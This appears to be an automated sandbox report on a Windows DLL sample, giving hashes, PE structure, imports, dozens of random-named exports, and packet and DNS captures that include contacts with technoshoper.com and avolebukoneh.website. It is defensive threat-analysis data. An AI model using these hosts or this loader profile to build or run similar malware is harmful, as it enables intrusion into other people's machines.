SHA512:	71ed19f4556c8b87b8a5c9d833404aa1cb531bdabfbd5527760fbe1530d24db8c2eab71c03b1d351878789cb06bdf34e0a95f9b829b2354b9c1a6514a8028b5d
SSDEEP:	3072:GBqOd5Ppz9GqG/DY3qPlwMAm7cewYwn87vm0xsP:Ed5R0/0e5wYM8fxsP
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10003aa1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x619A50D2 [Sun Nov 21 13:59:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	683f6686809eced856b5380c2bb19aab

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FA3307E3B07h
call 00007FA3307E3C89h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FA3307E39B3h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1000E010h]
push dword ptr [ebp+08h]
call dword ptr [1000E00Ch]
push C0000409h
call dword ptr [1000E014h]
push eax
call dword ptr [1000E018h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [1000E01Ch]
test eax, eax
je 00007FA3307E3B07h
push 00000002h
pop ecx
int 29h
mov dword ptr [10023978h], eax
mov dword ptr [10023974h], ecx
mov dword ptr [10023970h], edx
mov dword ptr [1002396Ch], ebx
mov dword ptr [10023968h], esi
mov dword ptr [10023964h], edi
mov word ptr [10023990h], ss
mov word ptr [10023984h], cs
mov word ptr [10023960h], ds
mov word ptr [1002395Ch], es
mov word ptr [10023958h], fs
mov word ptr [10023954h], gs
pushfd
pop dword ptr [10023988h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [1002397Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00023980h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x217a0	0x67c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21e1c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x28000	0xe58	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x21008	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x21040	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc688	0xc800	False	0.59001953125	data	6.61531340034	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x143f6	0x14400	False	0.653790509259	data	6.24384205603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x23000	0x33e8	0xa00	False	0.137109375	data	1.84040709272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x27000	0xf8	0x200	False	0.3359375	data	2.52739185048	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x28000	0xe58	0x1000	False	0.713134765625	data	6.21586040428	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x27060	0x91	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLastError, GetProcessHeap, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedFlushSList, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, LCMapStringW, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x100027a0
adqehmqaggtoqofda	2	0x10002ad0
awkikcxxkllcr	3	0x10002dc0
bajeavk	4	0x10002bc0
bmxjlzqnt	5	0x10002d70
brjfiyoeklkkw	6	0x10002cb0
bwmqatrady	7	0x10002ba0
cjnmruhixcem	8	0x10002e20
clucgffoininw	9	0x10002e40
dazgiueqfwuxb	10	0x10002da0
dxsvvnmotmchi	11	0x10002bb0
ehwwtlhtikww	12	0x10002e50
eiubjpotstnk	13	0x10002b00
elxsaklbmulwa	14	0x10002ae0
fdrtmdvvgpfggzito	15	0x10002e60
fxqdlsnrgdtt	16	0x10002e00
fyakogchg	17	0x10002cc0
fzefjbodxdka	18	0x10002cd0
gaisugiznqorxhiy	19	0x10002b60
geqtnjjw	20	0x10002c40
ghtfenarecqvluxyv	21	0x10002bd0
gzhvysfqmuicj	22	0x10002d00
hymiskqtceikrtrm	23	0x10002c20
ioeawerexgbvgz	24	0x10002b90
jztmiwvotkan	25	0x10002d10
kctahkwdbfuhomwa	26	0x10002c80
kmpuqrzvphdds	27	0x10002ac0
letlusyccruvc	28	0x10002a90
lhxdulcxxwcouyiuu	29	0x10002d80
mknadnu	30	0x10002d30
mmerfzvrtoktea	31	0x10002d20
mslyssgiex	32	0x10002ab0
mvqzkrqxghjrx	33	0x10002c00
nizhyeqid	34	0x10002aa0
nyorfvlyskg	35	0x10002d50
omxbscczwmubgdeh	36	0x10002be0
pifrrtnrduomyvegz	37	0x10002d60
plqxwstzwjyqpqvt	38	0x10002eb0
pnvmixkwdolgo	39	0x10002c70
prffyslwoopx	40	0x10002c50
qavduwunnla	41	0x10002c10
qdgaarp	42	0x10002c30
qgtbvnye	43	0x10002db0
qwfpstnczzdnqlr	44	0x10002b20
qzwhppyzxaaq	45	0x10002b80
rdldqgqekkspdhq	46	0x10002ec0
rhbjboesur	47	0x10002b30
rjcedvgopohwmp	48	0x10002b50
rxylajluocfwt	49	0x10002e70
sbxbjwmbj	50	0x10002ce0
scvhwpjrz	51	0x10002b10
sdylurwiipah	52	0x10002b40
tsmgjqzbvd	53	0x10002bf0
twqvivahqhapo	54	0x10002df0
twstqqlpvoiara	55	0x10002ea0
tysciaetwsomn	56	0x10002cf0
ujdtbin	57	0x10002c60
uubvxhwbea	58	0x10002e10
veuxogdtraau	59	0x10002e30
vihvenhoacda	60	0x10002ca0
vsstkhut	61	0x10002af0
wkdogcnbhkbhoxdg	62	0x10002e90
wlgnjgzrfne	63	0x10002d90
wrkcnhpbwbfwqua	64	0x10002b70
yvrwcqjpk	65	0x10002dd0
ywkxozhf	66	0x10002c90
zbitjkcvymbsikukx	67	0x10002e80
zcoooeihzzi	68	0x10002d40
zlcftqkbi	69	0x10002de0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:27:44.612165928 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.612200022 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.612262011 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.615874052 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.615911007 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.615977049 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.616591930 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.616617918 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.618417025 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.618436098 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.669540882 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.669630051 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.678086042 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.678164959 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.702368021 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.702394009 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.702866077 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.702919960 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.714674950 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.714694977 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.715020895 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.715080976 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.717164040 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745214939 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745265007 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745277882 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745297909 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745312929 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745340109 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745343924 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745352983 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745381117 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745410919 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745415926 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745421886 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745456934 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745461941 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745501995 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745506048 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745521069 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:44.745543003 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.745568037 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.776643991 CET	49819	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:44.776679993 CET	443	49819	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:59.654352903 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:59.654453993 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:27:59.654459000 CET	443	49820	172.67.70.134	192.168.2.4
Nov 22, 2021 14:27:59.654510975 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:28:01.225691080 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.225739002 CET	443	49827	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.225835085 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.226217031 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.226248026 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.226342916 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.571176052 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.571213961 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.617090940 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.617125988 CET	443	49827	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.620763063 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.620799065 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.620882988 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.621840000 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.621881962 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.621942997 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.627049923 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.627074957 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.628954887 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.628995895 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.632533073 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.632711887 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.638951063 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.638971090 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.639416933 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.639529943 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.639548063 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.660938978 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.661041021 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.661041975 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.661096096 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.663315058 CET	49828	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.663336992 CET	443	49828	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.670588970 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.670680046 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.671013117 CET	443	49827	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.671092033 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.673139095 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.673224926 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.730032921 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.730093002 CET	443	49827	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.730370045 CET	443	49827	216.58.215.230	192.168.2.4
Nov 22, 2021 14:28:01.730449915 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:28:01.736114025 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.736152887 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.736423016 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.736489058 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.737452030 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.740427971 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.740469933 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.740870953 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.740946054 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.768955946 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.769042015 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:01.769066095 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.769099951 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.778888941 CET	49829	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:01.778934956 CET	443	49829	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:16.664822102 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:16.664910078 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:28:16.664911032 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:28:16.664973974 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:29:15.309740067 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:29:15.309815884 CET	443	49830	172.67.69.19	192.168.2.4
Nov 22, 2021 14:29:15.309839964 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:29:15.309880018 CET	49830	443	192.168.2.4	172.67.69.19
Nov 22, 2021 14:29:15.310026884 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:29:15.310065985 CET	49827	443	192.168.2.4	216.58.215.230
Nov 22, 2021 14:29:15.310621023 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:29:15.310890913 CET	49820	443	192.168.2.4	172.67.70.134
Nov 22, 2021 14:31:23.143404007 CET	49926	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.143444061 CET	443	49926	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.143769979 CET	49926	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.144432068 CET	49926	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.144448996 CET	443	49926	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.205609083 CET	443	49926	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.208045006 CET	49927	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.208112955 CET	443	49927	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.208532095 CET	49927	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.209590912 CET	49927	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.209619045 CET	443	49927	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.269336939 CET	443	49927	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.270796061 CET	49928	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.270858049 CET	443	49928	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.271256924 CET	49928	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.271897078 CET	49928	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.271929979 CET	443	49928	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.333281040 CET	443	49928	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.336199045 CET	49929	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.336241961 CET	443	49929	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.336579084 CET	49929	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.337162971 CET	49929	443	192.168.2.4	45.9.20.245
Nov 22, 2021 14:31:23.337177992 CET	443	49929	45.9.20.245	192.168.2.4
Nov 22, 2021 14:31:23.398690939 CET	443	49929	45.9.20.245	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:27:26.231281042 CET	54531	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:27:31.673710108 CET	53097	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:27:32.366868973 CET	49257	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:27:32.388309956 CET	53	49257	8.8.8.8	192.168.2.4
Nov 22, 2021 14:27:41.650144100 CET	62389	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:27:41.669125080 CET	53	62389	8.8.8.8	192.168.2.4
Nov 22, 2021 14:27:43.649283886 CET	49910	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:27:43.677377939 CET	53	49910	8.8.8.8	192.168.2.4
Nov 22, 2021 14:27:44.501008987 CET	55854	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:27:44.522675037 CET	53	55854	8.8.8.8	192.168.2.4
Nov 22, 2021 14:28:00.573474884 CET	52991	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:28:00.735754013 CET	53700	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:28:01.168380022 CET	51726	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:28:01.196304083 CET	53	51726	8.8.8.8	192.168.2.4
Nov 22, 2021 14:28:01.597023010 CET	56794	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:28:01.618357897 CET	53	56794	8.8.8.8	192.168.2.4
Nov 22, 2021 14:31:23.118870974 CET	61522	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:31:23.139362097 CET	53	61522	8.8.8.8	192.168.2.4
Nov 22, 2021 14:31:29.860774994 CET	52337	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:31:29.884552002 CET	53	52337	8.8.8.8	192.168.2.4
Nov 22, 2021 14:31:30.508882046 CET	55046	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:31:30.533592939 CET	53	55046	8.8.8.8	192.168.2.4
Nov 22, 2021 14:31:34.804045916 CET	49612	53	192.168.2.4	8.8.8.8
Nov 22, 2021 14:31:34.831486940 CET	53	49612	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 22, 2021 14:27:26.231281042 CET	192.168.2.4	8.8.8.8	0x6eea	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:31.673710108 CET	192.168.2.4	8.8.8.8	0x2b24	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:32.366868973 CET	192.168.2.4	8.8.8.8	0x67e0	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:41.650144100 CET	192.168.2.4	8.8.8.8	0x2aba	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:43.649283886 CET	192.168.2.4	8.8.8.8	0xe8cb	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:44.501008987 CET	192.168.2.4	8.8.8.8	0xdc43	Standard query (0)	btloader.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:00.573474884 CET	192.168.2.4	8.8.8.8	0x901	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:00.735754013 CET	192.168.2.4	8.8.8.8	0x3405	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:01.168380022 CET	192.168.2.4	8.8.8.8	0xdafc	Standard query (0)	ad.doubleclick.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:01.597023010 CET	192.168.2.4	8.8.8.8	0xafb3	Standard query (0)	ad-delivery.net	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:23.118870974 CET	192.168.2.4	8.8.8.8	0x2283	Standard query (0)	technoshoper.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:29.860774994 CET	192.168.2.4	8.8.8.8	0xcde	Standard query (0)	technoshoper.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:30.508882046 CET	192.168.2.4	8.8.8.8	0x9c55	Standard query (0)	technoshoper.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:34.804045916 CET	192.168.2.4	8.8.8.8	0x30c6	Standard query (0)	avolebukoneh.website	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 22, 2021 14:27:26.250509977 CET	8.8.8.8	192.168.2.4	0x6eea	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:27:31.709156990 CET	8.8.8.8	192.168.2.4	0x2b24	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:27:32.388309956 CET	8.8.8.8	192.168.2.4	0x67e0	No error (0)	contextual.media.net		2.18.160.23	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:41.669125080 CET	8.8.8.8	192.168.2.4	0x2aba	No error (0)	hblg.media.net		2.18.160.23	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:43.677377939 CET	8.8.8.8	192.168.2.4	0xe8cb	No error (0)	lg3.media.net		2.18.160.23	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:44.522675037 CET	8.8.8.8	192.168.2.4	0xdc43	No error (0)	btloader.com		172.67.70.134	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:44.522675037 CET	8.8.8.8	192.168.2.4	0xdc43	No error (0)	btloader.com		104.26.7.139	A (IP address)	IN (0x0001)
Nov 22, 2021 14:27:44.522675037 CET	8.8.8.8	192.168.2.4	0xdc43	No error (0)	btloader.com		104.26.6.139	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:00.595093966 CET	8.8.8.8	192.168.2.4	0x901	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:28:00.755229950 CET	8.8.8.8	192.168.2.4	0x3405	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:28:01.196304083 CET	8.8.8.8	192.168.2.4	0xdafc	No error (0)	ad.doubleclick.net	dart.l.doubleclick.net		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:28:01.196304083 CET	8.8.8.8	192.168.2.4	0xdafc	No error (0)	dart.l.doubleclick.net		216.58.215.230	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:01.618357897 CET	8.8.8.8	192.168.2.4	0xafb3	No error (0)	ad-delivery.net		172.67.69.19	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:01.618357897 CET	8.8.8.8	192.168.2.4	0xafb3	No error (0)	ad-delivery.net		104.26.2.70	A (IP address)	IN (0x0001)
Nov 22, 2021 14:28:01.618357897 CET	8.8.8.8	192.168.2.4	0xafb3	No error (0)	ad-delivery.net		104.26.3.70	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:23.139362097 CET	8.8.8.8	192.168.2.4	0x2283	No error (0)	technoshoper.com		45.9.20.245	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:29.884552002 CET	8.8.8.8	192.168.2.4	0xcde	No error (0)	technoshoper.com		45.9.20.245	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:30.533592939 CET	8.8.8.8	192.168.2.4	0x9c55	No error (0)	technoshoper.com		45.9.20.245	A (IP address)	IN (0x0001)
Nov 22, 2021 14:31:34.831486940 CET	8.8.8.8	192.168.2.4	0x30c6	No error (0)	avolebukoneh.website		37.120.206.119	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

https:

btloader.com

ad.doubleclick.net

ad-delivery.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49819	172.67.70.134	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
